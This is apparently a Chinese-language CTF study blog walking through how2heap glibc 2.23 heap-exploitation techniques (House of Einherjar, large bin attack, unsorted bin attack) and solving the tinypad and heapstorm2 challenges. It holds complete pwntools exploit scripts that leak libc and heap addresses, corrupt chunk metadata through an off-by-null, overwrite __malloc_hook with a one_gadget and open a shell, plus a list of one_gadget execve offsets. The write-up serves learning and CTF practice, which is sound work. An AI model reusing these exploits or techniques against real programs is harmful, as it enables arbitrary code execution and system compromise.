0%

how2heap - house_of_einherjar&tinypad

ubuntu16.04 libc2.23

house_of_einherjar.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
Credit to st4g3r for publishing this technique
The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()
This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak.
*/

int main()
{
fprintf(stderr, "Welcome to House of Einherjar!\n");
fprintf(stderr, "Tested in Ubuntu 16.04 64bit.\n");
fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");
fprintf(stderr, "This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

uint8_t* a;
uint8_t* b;
uint8_t* d;

fprintf(stderr, "\nWe allocate 0x38 bytes for 'a'\n");
a = (uint8_t*) malloc(0x38);
fprintf(stderr, "a: %p\n", a);

int real_a_size = malloc_usable_size(a);
fprintf(stderr, "Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);

// create a fake chunk
fprintf(stderr, "\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
fprintf(stderr, "However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
fprintf(stderr, "We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
fprintf(stderr, "(although we could do the unsafe unlink technique here in some scenarios)\n");

size_t fake_chunk[6];

fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
fake_chunk[2] = (size_t) fake_chunk; // fwd
fake_chunk[3] = (size_t) fake_chunk; // bck
fake_chunk[4] = (size_t) fake_chunk; //fwd_nextsize
fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize


fprintf(stderr, "Our fake chunk at %p looks like:\n", fake_chunk);
fprintf(stderr, "prev_size (not used): %#lx\n", fake_chunk[0]);
fprintf(stderr, "size: %#lx\n", fake_chunk[1]);
fprintf(stderr, "fwd: %#lx\n", fake_chunk[2]);
fprintf(stderr, "bck: %#lx\n", fake_chunk[3]);
fprintf(stderr, "fwd_nextsize: %#lx\n", fake_chunk[4]);
fprintf(stderr, "bck_nextsize: %#lx\n", fake_chunk[5]);

/* In this case it is easier if the chunk size attribute has a least significant byte with
* a value of 0x00. The least significant byte of this will be 0x00, because the size of
* the chunk includes the amount requested plus some amount required for the metadata. */
b = (uint8_t*) malloc(0xf8);
int real_b_size = malloc_usable_size(b);

fprintf(stderr, "\nWe allocate 0xf8 bytes for 'b'.\n");
fprintf(stderr, "b: %p\n", b);

uint64_t* b_size_ptr = (uint64_t*)(b - 8);
/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/

fprintf(stderr, "\nb.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "b.size is: (0x100) | prev_inuse = 0x101\n");
fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
a[real_a_size] = 0;
fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "This is easiest if b.size is a multiple of 0x100 so you "
"don't change the size of b, only its prev_inuse bit\n");
fprintf(stderr, "If it had been modified, we would need a fake chunk inside "
"b where it will try to consolidate the next chunk\n");

// Write a fake prev_size to the end of a
fprintf(stderr, "\nWe write a fake prev_size to the last %lu bytes of a so that "
"it will consolidate with our fake chunk\n", sizeof(size_t));
size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
fprintf(stderr, "Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;

//Change the fake chunk's size to reflect b's new prev_size
fprintf(stderr, "\nModify fake chunk's size to reflect b's new prev_size\n");
fake_chunk[1] = fake_size;

// free b and it will consolidate with our fake chunk
fprintf(stderr, "Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
free(b);
fprintf(stderr, "Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

//if we allocate another chunk before we free b we will need to
//do two things:
//1) We will need to adjust the size of our fake chunk so that
//fake_chunk + fake_chunk's size points to an area we control
//2) we will need to write the size of our fake chunk
//at the location we control.
//After doing these two things, when unlink gets called, our fake chunk will
//pass the size(P) == prev_size(next_chunk(P)) test.
//otherwise we need to make sure that our fake chunk is up against the
//wilderness

fprintf(stderr, "\nNow we can call malloc() and it will begin in our fake chunk\n");
d = malloc(0x200);
fprintf(stderr, "Next malloc(0x200) is at %p\n", d);
}

通篇下来最重要的两点在size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);fake_chunk[1] = fake_size;

代码通过模拟漏洞修改了b的prev_inuse位为0,此时再free(b)的话就会触发向后合并,而向后合并时合并的chunk是由prev_size得到的,当我们把prev_size改成了b's chunk header-fake_chunk's heder,就会在fake chunk处触发unlink从而导致fake_chunk被合并,而且此时由于紧邻top_chunk,top_chunk就直接被改到我们栈上fake_chunk处去了,再malloc的时候就可以把我们那块fake_chunk malloc出来

某种意义上来说这个好像也和house of force一样?是通过利用topchunk从而malloc出我们想要的地址来,(代码中写到的If it had been modified, we would need a fake chunk inside b where it will try to consolidate the next chunk,就是说如果我们在溢出的时候把size大小更改了,比如从0x101改成0x100,再去进行操作的时候由于此时得到的nextchunk在被更改chunk的内部,所以我们需要能够写到这个地方修改出一个假的chunk头才能不报错)

不过我有一点没弄明白:fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size,因为在这里设置了新top chunk之后好像没必要改这个prev_size?就算把这步操作改成0也还是一样达到了效果,所以这里好像有一个疑点(后来发现只是我单纯的把这个理解成设置top_chunk了,但其实这个利用说白了就是修改prev_size还有chunk的inues位,用来oevrlap chunk也是一样的用法)

….感觉慢慢熟悉起堆来之后就不想写debug了23333,因为稍微进GDB看一下就能弄清楚了,所以也是直接撸题吧

tinypad

程序有很多小函数,这里就不做分析了,直接分析主要的逻辑或有漏洞的逻辑

程序分析

read_until

1583305845380

其中当i=len的时候,a1[i]=0的操作下标越界,可能会产生off_by_null

Add

1583304338827

首先从四个memo中获取一个size段为空的下标,然后malloc(size),size为10x100之间,对应的chunk也就是在0x200x110之间,然后根据存在bss的指针读入size的数据

delete

1583304560937

这里如果读入的下标是1对应数组下标0,判断对应处size是否为零,然后free掉ptr之后把size置零,没有把ptr置零

edit

1583304758155

edit稍微有点意思,因为我们的mome每次做操作都是从+16的位置开始的,开始的时候我没看懂这个是什么意思,后来在edit这里发现这个前面32*_QWORD的空间是用来当缓冲区的,edit之前先把下标对应的chunk中的内容用strcpy拷到memo缓冲区中去,然后用strlen获取缓冲区的长度,并将这段长度的内容输出,接着再通过strlen获取对应chunk中字符串的长度,然后read到缓冲区中去

Exploit&漏洞分析

漏洞应该比较明显了

  1. read_until的off_by_null
  2. 由于每次程序的显示是通过ptr是否为空来判断是否需要输出的,但是由于清除的是size,所以每次都会输出…直接leak各种base
  3. 结合上面的使用house_of_einherjar即可,不过我才知道这个用法原来是只要修改了prev_size然后用就好23333,本来以为是专门用来设置top_chunk的,不过也确实说明了prev_size确实可以改的很大,这是我之前在写题的时候没有想到的

有了漏洞思路之后我的做法大致就是,先malloc四个memo,然后泄露出libc和heap之后再把这几个全部free掉,用于重新构造利用的chunk结构

再次构造的时候大概就是这样:

0x101 0x71 0x101
填上自身指针用于unlink 用于fastbin attck、填上prev_size,还有off_by_null 修改这个chunk的prev_inuse位

free的时候就会直接把这三个全部都放到top_chunk里面去了,还有一个overlap的0x70 fastchunk

后续就是常规的fastbin attack了

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './tinypad' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

# todo here
def add(size,content):
p.recvuntil('(CMD)>>> ')
p.sendline('A')
p.recvuntil('(SIZE)>>> ')
p.sendline(str(size))
p.recvuntil('(CONTENT)>>> ')
p.sendline(content)
def free(idx):
p.recvuntil('(CMD)>>> ')
p.sendline('D')
p.recvuntil('(INDEX)>>> ')
p.sendline(str(idx+1))
def edit(idx,content):
p.recvuntil('(CMD)>>> ')
p.sendline('E')
p.recvuntil('(INDEX)>>> ')
p.sendline(str(idx+1))
p.recvuntil('(CONTENT)>>> ')
p.sendline(content)
p.recvuntil('(Y/n)>>> ')
p.sendline('Y')

add(0xf0,'a'*0xf0)#0 0x100 chunk
add(0x100,'b'*0x100)#1 0x110 chunk
add(0xf0,'c'*0xf0)#2 0x100 chunk
add(0x100,'d'*0x100)#3 0x110 chunk
free(2)
free(0)
p.recvuntil('CONTENT: ')
heap_base=my_u64(p.recv(4))-0x210
loginfo('heapbase',heap_base)
p.recvuntil(' # INDEX: 3')
p.recvuntil('CONTENT: ')
libc_base=my_u64(p.recv(6))-0x3c4b78
loginfo('libcbase',libc_base)
free(3)
free(1)#clear

#construct again
add(0xf0,p64(heap_base)*2+'\x00'*0xe0)#0 0x100
add(0x68,'\x00'*0x68)#1 0x70
add(0xf0,'\x00'*0xf0)#2 0x100

free(1)
add(0x68,'\x00'*0x60+p64(0x170))#set prev_size + off_by_null
free(2)#Merge all

free(1)#set to fastbin first
#(0,,,)
add(0xe0,'\x00'*0xe0)
#(0,1)
add(0xf0,(p64(0)+p64(0x71)+p64(libc_base+0x3c4aed)).ljust(0x70,'\x00')+p64(0)+p64(0x101)+'\x00'*(0xf0-0x80))#fill fakesize0x101 for check by free
#(0,1,2)
add(0x60,'\x00'*0x60)
#(0,1,2,3)
free(0)
#(,1,2,3)
add(0x68,'\x00'*0x13+p64(libc_base+0xf02a4))
#(0,1,2,3)
#gdb.attach(p,'b *0x400c12')
free(3)
p.recvuntil('(CMD)>>> ')
p.sendline('A')
p.recvuntil('(SIZE)>>> ')
p.sendline('1')


p.interactive()
'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
fastbin addree to size: (offset_to_fastbinY/8+2)<<(4 or 3)
largebin chunksize:0x410|0x450|0x490|0x4C0...
'''

how2heap - large_bin_attack&heapstorm2

ubuntu16.04 libc2.23

large_bin_attack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
/*
This technique is taken from
https://dangokyo.me/2018/04/07/a-revisit-to-large-bin-in-glibc/
[...]
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
[...]
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
For more details on how large-bins are handled and sorted by ptmalloc,
please check the Background section in the aforementioned link.
[...]
*/

#include<stdio.h>
#include<stdlib.h>

int main()
{
fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see glibc_build.sh for build instructions.\n");
fprintf(stderr, "This file demonstrates large bin attack by writing a large unsigned long value into stack\n");
fprintf(stderr, "In practice, large bin attack is generally prepared for further attacks, such as rewriting the "
"global variable global_max_fast in libc for further fastbin attack\n\n");

unsigned long stack_var1 = 0;
unsigned long stack_var2 = 0;

fprintf(stderr, "Let's first look at the targets we want to rewrite on stack:\n");
fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);

unsigned long *p1 = malloc(0x320);
fprintf(stderr, "Now, we allocate the first large chunk on the heap at: %p\n", p1 - 2);

fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
" the first large chunk during the free()\n\n");
malloc(0x20);

unsigned long *p2 = malloc(0x400);
fprintf(stderr, "Then, we allocate the second large chunk on the heap at: %p\n", p2 - 2);

fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the next large chunk with"
" the second large chunk during the free()\n\n");
malloc(0x20);

unsigned long *p3 = malloc(0x400);
fprintf(stderr, "Finally, we allocate the third large chunk on the heap at: %p\n", p3 - 2);

fprintf(stderr, "And allocate another fastbin chunk in order to avoid consolidating the top chunk with"
" the third large chunk during the free()\n\n");
malloc(0x20);

free(p1);
free(p2);
fprintf(stderr, "We free the first and second large chunks now and they will be inserted in the unsorted bin:"
" [ %p <--> %p ]\n\n", (void *)(p2 - 2), (void *)(p2[0]));

malloc(0x90);
fprintf(stderr, "Now, we allocate a chunk with a size smaller than the freed first large chunk. This will move the"
" freed second large chunk into the large bin freelist, use parts of the freed first large chunk for allocation"
", and reinsert the remaining of the freed first large chunk into the unsorted bin:"
" [ %p ]\n\n", (void *)((char *)p1 + 0x90));

free(p3);
fprintf(stderr, "Now, we free the third large chunk and it will be inserted in the unsorted bin:"
" [ %p <--> %p ]\n\n", (void *)(p3 - 2), (void *)(p3[0]));

//------------VULNERABILITY-----------

fprintf(stderr, "Now emulating a vulnerability that can overwrite the freed second large chunk's \"size\""
" as well as its \"bk\" and \"bk_nextsize\" pointers\n");
fprintf(stderr, "Basically, we decrease the size of the freed second large chunk to force malloc to insert the freed third large chunk"
" at the head of the large bin freelist. To overwrite the stack variables, we set \"bk\" to 16 bytes before stack_var1 and"
" \"bk_nextsize\" to 32 bytes before stack_var2\n\n");

p2[-1] = 0x3f1;
p2[0] = 0;
p2[2] = 0;
p2[1] = (unsigned long)(&stack_var1 - 2);
p2[3] = (unsigned long)(&stack_var2 - 4);

//------------------------------------

malloc(0x90);

fprintf(stderr, "Let's malloc again, so the freed third large chunk being inserted into the large bin freelist."
" During this time, targets should have already been rewritten:\n");

fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);

return 0;
}

感觉这种画个图的话就很明了,我这里画了一个free(p3)之后的图,unsortedbin上有两个chunk,largebin上有一个chunk

这时largebin中的chunk fd_nextsize和bk_nextsize都指向自己,再来看看等下把chunk从unsortedbin中卸下来之后插入largebin的时候是什么样的

largebin在原代码中的插入(largebin对应bin链有chunk的情况)是这样的:

1582823683795

当我们改了原largebin链中的chunk之后,就变成了这样

此时再插入0x410的chunk(对应victim),就会执行最下面那个else分支中的代码,

1
2
3
4
5
6
7
8
else{
victim->fd_nextsize = fwd;//此时的fwd指向0x3f0的chunk
victim->bk_nextsize = fwd->bk_nextsize;//栈指针给到victim的bk_nextsize
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;//此时var2对应的偏移刚好是->bk_nextsize->fd_nextsize
//所以var2会被赋值为victim
}
bck = fwd->bk;//此时bck被设置成了栈指针

接着看,因为后面还会执行一段代码

1
2
3
4
5
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;//Here!栈指针指向位置的对应偏移处(var1)就也被赋值成了victim

原理就是这么个原理,任意地址写了两个vicitm的地址上去

下面直接撸题实操吧

heapstorm2

这个题说实话写的时候overlap之后都不知道该怎么用…所以后来就直接参考了wp(跪…真的是前路漫漫啊)

程序分析

首先根据程序的mmap创建一个新的segment,这样在IDA中看起来会好一些

init

程序用mallopt关掉了所有的fastbin,然后用mmap分配了一块固定地址的内存,并在random_area(0x13370800)为起始的位置存放了0x18个字节的随机数据,其中0偏移处的数据用来异或存放堆指针,+1偏移处的数据用来异或存放申请的size
然后+2和+3偏移处,也就是random_area[1]处的两个数据,是被设置成相等的

设置mask的意思也就是说我们在程序中申请的chunk指针还有对应的size都会被异或两个固定值然后放在这块内存区域

alloc

最多只能有16个chunk,按照顺序排放,其中mask_xor函数就是用来xor对应数据的了,mask1用来xor指针,mask2用来异或size,因为random_area的前四个qword都有意义所以我们看到的数组下标都是+2的(这里可以设置一下结构体再优化一下),calloc(size)之后没有赋值操作,所以只是分配

update

update函数中会往chunk里读入数据(长度不能大于size-0xc),在最后再加上0xc长度的数据HEAPSTORM_II,但是补0的时候发生了溢出,构成off_by_null,这也是程序的漏洞点所在

delete

1582822986854

delete函数就是输入下标然后free,并”清空”记录的数据

view

1582823036813

view函数比较苛刻,需要当我们random_area[1]处的两个值异或为0x13377331的时候才能writen,所以一开始leak不了,这也是我当时卡在这个题一直出不来的主要原因

漏洞分析&exploit

程序只有一个off_by_null,所以就只能shrink freed chunk然后构造overlap了(提醒一下自己以后shrink时一定要记得如果chunk被放回了bin链然后再用fit匹配出来时会触发unlink,如果不设置好fake prev_size,由于前面那个size已经被改了所以unlink检查时就会崩掉,免得老在这坑住)

然后后面的思路就是在random_area的上方利用largebin attack写上一个fakesize构造fake chunk,并在对应bk的地方也写上下图中victim的地址,首先是为了下一步操作时有个可写地址,但其实这个bk还有大用处

largebin attack之后利用overlap将映射区域对应fake chunk的固定地址写在新链入unsortedbin中的chunk的bk上,为了把random_area的内存calloc出来。这个过程可能有点绕,画个图帮自己理解一下(这里unsortedbin上的chunk是largebin attack之后放上去的,为了方便我就干脆画在一起了)

当我们利用largebin attack写上值之后,我们在fakechunk上已经有了size和bk,此时的bk是victim

但是由于PIE的映射是0x5?开头的地址,也就是说我们能接着calloc出来的chunk大小不能超过0x50,可用的地方还得再缩小之后减0xC。而且当mask损坏的时候如果指针都不变,将会没有办法继续进行操作(而且这块区域是被初始化过的,好像不能直接在操作中给mask赋值,不过利用那个字符串去计算一个说不定可以),我当时想尽办法想通过这个0x50的chunk实现exploit但是始终不行,所以就又去参考了师傅们的WP,发现师傅们是通过再构造一个再calloc出来的(跪),瞬间就好像又有思路了

我们写的bk是vicitm,所以calloc这个0x5?的chunk之后victim又被放到unsortedbin上面去了,但是如果这个victim chunk内容是我们通过overlap控制的话,就可以再接着控制其bk然后再calloc一个fake chunk,而且此时fakechunk的构造更简单了因为我们已经有了一个0x5?的chunk,可以直接写一个大一点的fakesize

在接着试图calloc random_area时,我们calloc出vicitm之后,还需要把fake chunk的bk再设置一下,因为unsortedbin卸下时需要可写地址,update那个0x5?的chunk就行(写的这个地址因为是libc的,所以在我这个利用中也发挥了很大的用处)

calloc出来这块mem之后,这里的值就全都被置零了,相当于列表清空..效果大概是这样的:

1582946763810

我这里没有清完,其实还可以清的更空一些,不过也够了。我的size设置的位置偏了8 23333因为当时怕影响到后面的数据

可以看到我们calloc出这块mem的时候,因为是先calloc再通过异或指针存到记录上,所以calloc之后的mask全都成0了,存上去的也就是真实值(0x133703d8 0xf0)

然后通过这个记录填上view需要的固定异或值,并填上我们前面写的libc地址的位置,还有size,直接读出来之后有任意地址写了就完事了!

我选择的是写__malloc_hookone_gadget,我看师傅们用的是__free_hook到system然后free一个有/bin/sh字符串的chunk,好像师傅们的更稳定一些,不过到后面任意地址读写之后就简单很多了也不多废话了

这里还记一个看师傅们博客看到的操作,就是largebin attack中如果我们能控制最开始的那个corrupt chunk就能多次利用进行largebin attack

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './heapstorm2' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
fastbin addree to size: (offset_to_fastbinY/8+2)<<(4 or 3)
largebin chunksize:0x410|0x450|0x490|0x4C0...
'''
# todo here
def alloc(size):
p.recvuntil('Command: ')
p.sendline('1')
p.recvuntil('Size: ')
p.sendline(str(size))
def update(idx,size,content):
p.recvuntil('Command: ')
p.sendline('2')
p.recvuntil('Index: ')
p.sendline(str(idx))
p.recvuntil('Size: ')
p.sendline(str(size))
p.recvuntil('Content: ')
p.sendline(content)
def delete(idx):
p.recvuntil('Command: ')
p.sendline('3')
p.recvuntil('Index: ')
p.sendline(str(idx))
def view(idx):
p.recvuntil('Command: ')
p.sendline('4')
p.recvuntil('Index: ')
p.sendline(str(idx))

alloc(0x18)#0 for off_by_null
alloc(0xC30)#1 for split
alloc(0x18)#2 for merge
alloc(0x18)#3 guard

payload='\x33'*0xBF0+p64(0xC00)#set fake prev_size
update(1,len(payload),payload)
delete(1)#(0,,2,3)
update(0,0x18-0xc,'a'*(0x18-0xc))#off_bu_null 0xC40->0xC00

#split 1 now
alloc(0xf0)#1 0x100 chunk
alloc(0x400)#4 0x410 chunk large
alloc(0x1f0)#5 0x200 chunk
alloc(0x410)#6 0x420 chunk large
#1 remain:0x131

delete(1)#(0,,2,3,4,5,6) for unlink
delete(2)#(0,,,3,4,5,6) merge&overlap

alloc(0xC50)#1 now chunk 1 overlap (4,5,6,remain) & remain to smallbin

#recover 0x410chunk's size & other chunk's size because of calloc--↓
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+='a'*0x400
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+='a'*0x410
payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
#------------------------------------------------------------------↑

#alloc(0x410)#2 !!!!!!!need a overlap chunk for victim do not alloc one like me before

delete(4)#(0,1,,3,,5,6) overlapped chunk 4 to ub
alloc(0x430)#2 set chunk 4 to largebin

#overwrite chunk 4 ------------------------↓
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)#mmap region above the random area
payload+=p64(0)+p64(0x133707d8-0x20)
update(1,len(payload),payload)#set for largebin attack
#------------------------------------------↑

delete(6)#(0,1,2,3,,5) 0x420chunk to ub
alloc(0x440)#4 0x420 chunk to largebin(largebin attack)

#reset 0x200&0x130 chunk's prev_inuse---------↓
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)#No other meanings,just ctrl+c ctrl+v
payload+=p64(0)+p64(0x133707d8-0x20)
payload+='a'*0x3e0
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+='a'*0x410
payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
#---------------------------------------------↑
#gdb.attach(p,'brva 0x113c')
delete(5)#(0,1,2,3,4)#set 0x200 chunk to ub

#reset 0x200 chunk's bk-----------------------↓
fake_chunk=0x133707c0
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)
payload+=p64(0)+p64(0x133707d8-0x20)
payload+='a'*0x3e0
payload+=p64(0)+p64(0x201)
payload+=p64(0)+p64(fake_chunk)
update(1,len(payload),payload)
#---------------------------------------------↑

alloc(0x1f0)#5 after this we can alloc the first 0x5? chunk
#an we need to pass the the chunk_is_mmapped check in _libc_malloc randomly XD
loginfo()

alloc(0x40)#6 get first mmap region chunk out
update(6,0x18,p64(0x100)+p64(0)+p64(0x133707b0))
#set another fake size&bk,and bk is used for writing libc address:(bck->fd = unsorted_chunks (av))

#reset 0x420 chunk's bk again----------------↓
#because we write the 0x420chunk's address(vicitm) on the bk of 0x5? chunk
#after we malloc out the 0x5? chunk,the 0x420 chunk back to unsortedbin again
#we can control the chunk's bk for malloc out the random_area next time
fake_chunk=0x133707c8
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+='a'*0x400
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+=p64(0)+p64(fake_chunk)
payload+='a'*0x400
payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
#--------------------------------------------↑

#We can allocate a 0x100 chunk at the random_area! Play our leak&write game now!!!!!!!!!!!!!!!!!!
alloc(0x410)#7
alloc(0xf0)#8

#Write the libaddress location&view key at index 0----↓
payload=p64(0)*5+p64(0)*2
payload+=p64(0x0)+p64(0x13377331)
payload+=p64(0x133707c0)+p64(8)
update(8,len(payload),payload)
#-----------------------------------------------------↑
view(0)
p.recvuntil('Chunk[0]: ')
libc_base=u64(p.recv(8))-0x3c4b78
loginfo('libc_base',libc_base)


#__malloc_hook to index 0---------------------↓
payload=p64(0)*5+p64(0)*2
payload+=p64(0x0)+p64(0x13377331)
payload+=p64(0x3c4b10+libc_base)+p64(8+0xc)
update(8,len(payload),payload)
#---------------------------------------------↑

update(0,8,p64(0x4526a+libc_base))
alloc(0x666)

p.interactive()

how2heap - unsorted_bin&zerostorage

ubuntu16.04 libc2.23

unsorted_bin_into_stack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main() {
intptr_t stack_buffer[4] = {0};

fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");

fprintf(stderr, "Allocating the victim chunk\n");
intptr_t* victim = malloc(0x100);

fprintf(stderr, "Allocating another chunk to avoid consolidating the top chunk with the small one during the free()\n");
intptr_t* p1 = malloc(0x100);

fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
free(victim);

fprintf(stderr, "Create a fake chunk on the stack");
fprintf(stderr, "Set size for next allocation and the bk pointer to any writable address");
stack_buffer[1] = 0x100 + 0x10;
stack_buffer[3] = (intptr_t)stack_buffer;

//------------VULNERABILITY-----------
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->size and victim->bk pointer\n");
fprintf(stderr, "Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (> 16 on x64) && < av->system_mem\n");
victim[-1] = 32;
victim[1] = (intptr_t)stack_buffer; // victim->bk is pointing to stack
//------------------------------------

fprintf(stderr, "Now next malloc will return the region of our fake chunk: %p\n", &stack_buffer[2]);
fprintf(stderr, "malloc(0x100): %p\n", malloc(0x100));
}

意思就是unsortedbin上有一个chunk,然后模拟漏洞更改了其size和bk,这样再malloc相同大小的chunk时这块chunk就不会被malloc,会被放到smallbin里面去,其中libc2.23中unsortedbin卸下的操作是:

1
2
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

这里bck就是victim->bk,所以卸下操作基本都是与bk指针相关,与fd无关。这个代码中只需要将栈上对应的size字段和bk设置好即可,0x100chunk被放到smallbin后unsortedbin中情况如图所示

此时可以无限malloc(0x100)都是这个stack chunk,bck始终是他自己

unsorted_bin_attack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <stdlib.h>

int main(){
fprintf(stderr, "This technique only works with buffers not going into tcache, either because the tcache-option for "
